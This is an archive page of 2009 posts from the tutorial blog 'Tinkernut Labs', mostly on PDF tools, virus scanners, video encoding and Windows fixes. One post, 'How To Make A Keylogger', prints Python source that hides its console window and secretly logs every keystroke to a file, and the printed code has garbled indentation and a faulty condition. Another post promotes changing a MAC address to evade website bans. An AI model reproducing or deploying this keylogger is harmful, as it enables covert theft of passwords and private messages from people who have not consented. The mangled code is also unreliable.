Tinkernut Labs



  • How To Create/Edit PDF Files For Free

    September 30, 2009 // davisde // Cool Websites, Software Tips, Web Tips Tags: adobe, diy, edit, free, freeware, how, read, software, to, tutorial, write 4 Responses






    This tutorial will show you ways to read, edit, and create PDF files without spending any money. It requires 3 different pieces of software:

    http://www.foxitsoftware.com
    http://www.acrosoftware.com
    http://www.hellopdf.com

  • Best Virus Scanner?

    September 26, 2009 // davisde // Safety & Security, Software Tips Tags: protect, secure, tinkernut, tricks, tutorial, virus 5 Responses






    This video compares the most popular virus scanners to see which one’s are the best.

  • How To Make A Keylogger

    September 11, 2009 // davisde // Hacks, Programming Tips Tags: computer, hack, hacking, keyboard, keylogger, programming, python, scripts, tinkernut, tips, tricks, tutorial 38 Responses


    KEYLOGGER SOURCECODE AND

    – Download Python: http://www.python.org/

    – Download Pyhook: pyhook.sourceforge.net

    – Download Python for Windows Extensions: http://sourceforge.net/projects/pywin32/

    SOURCE:

    import win32api
    import win32console
    import win32gui
    
    import pythoncom, pyHook
    
    win = win32console.GetConsoleWindow()
    win32gui.ShowWindow(win,0)
    
    def OnKeyboardEvent(event):
     if event.Ascii==5:
            
    _exit(1)
    
     if event.Ascii != 0 or 8:
     f=open('c:output.txt','r')
           
     buffer=f.read()
     f.close()
            
    f=open('c:output.txt','w')
     keylogs=chr(event.Ascii)
           
     if event.Ascii==13:
     keylogs='/n'
     buffer += 
    keylogs
     f.write(buffer)
     f.close()
    
    hm = pyHook.HookManager()
    hm.KeyDown = OnKeyboardEvent
    hm.HookKeyboard()
    pythoncom.PumpMessages()
  • Hacking Tip: Change Your MAC Address

    September 4, 2009 // davisde // Hacks Tags: address, block, bypass, change, game, hack, hacking, hide, ip, mac, sites, tips, tricks, tutorial, website 3 Responses





    This video will show you how to bypass websites that have blocked you by changing your MAC address, which will change your IP address. You can download now download it from this link: http://www.tinkernut.com/demos/205_mac/macmakeup195d.zip

  • The Basics Of Video Encoding

    August 21, 2009 // davisde // Multimedia Tips, Programming Tips, Software Tips Tags: convert, decode, encode, format, guide, help, multimedia, tutorial, Video 5 Responses





    This video covers the basics of converting and encoding videos.

  • How To Fix A Windows BSOD

    August 7, 2009 // davisde // Safety & Security, Video Tags: 7, boot, data, safe, screen, tinkernut, tips, tricks, tutorial, vista, windows, xp 18 Responses





    This video covers the basics of how to fix the most common Windows Blue Screen Errors, commonly referred to as the Blue Screen of Death (BSOD).

  • Howcast & Tinkernut: How To Make An Adobe Flash Photo Gallery

    July 27, 2009 // davisde // Howcast & Tinkernut, Multimedia Tips, Programming Tips Tags: actionscript, adobe, flash, Howcast & Tinkernut, photo, picture, pictures, programming, tinkernut, tips, tricks, tutorial, web 8 Responses



    How To Create an Adobe Flash Slide Show on Howcast

    Don’t just send people a stack of static photo files; share them in style by creating a photo gallery in Flash.

  • Basic Cloud Computing

    July 24, 2009 // davisde // Video, Web Tips Tags: backup, cloud, computing, files, free, internet, online, operating, os, proxy, system, tinkernut, tips, tricks, tutorial 56 Responses


    This video covers the basics of cloud computing. For questions and for all the links used in this video, please visit the URL below:

    http://www.tinkernut.com/forum/video-tutorial-help/how-to-cloud-compute

  • How To Make An Online Store

    July 3, 2009 // davisde // DIY Projects, Programming Tips, Web Tips Tags: custom, free, make, money, online, tips, tricks, tutorial, webmaster, website 3 Responses


    This video shows you three different free ways to create an online store. For help, please visit the forum link: http://www.tinkernut.com/forum/video-tutorial-help/how-to-make-an-online-store

  • Best Search Engine?

    June 26, 2009 // davisde // Video, Web Tips Tags: engine, google, Hacks, search, tips, tricks, tutorial 75 Responses


    This video reviews the two most popular search engines, Google and Yahoo as well as the two newest search engines, Bing and Wolfram Alpha. Which one is your favorite? For all the links and tips used in this video, please visit the URL below:
    http://www.tinkernut.com/forum/video-tutorial-help/best-search-engine

← Older posts
Newer posts →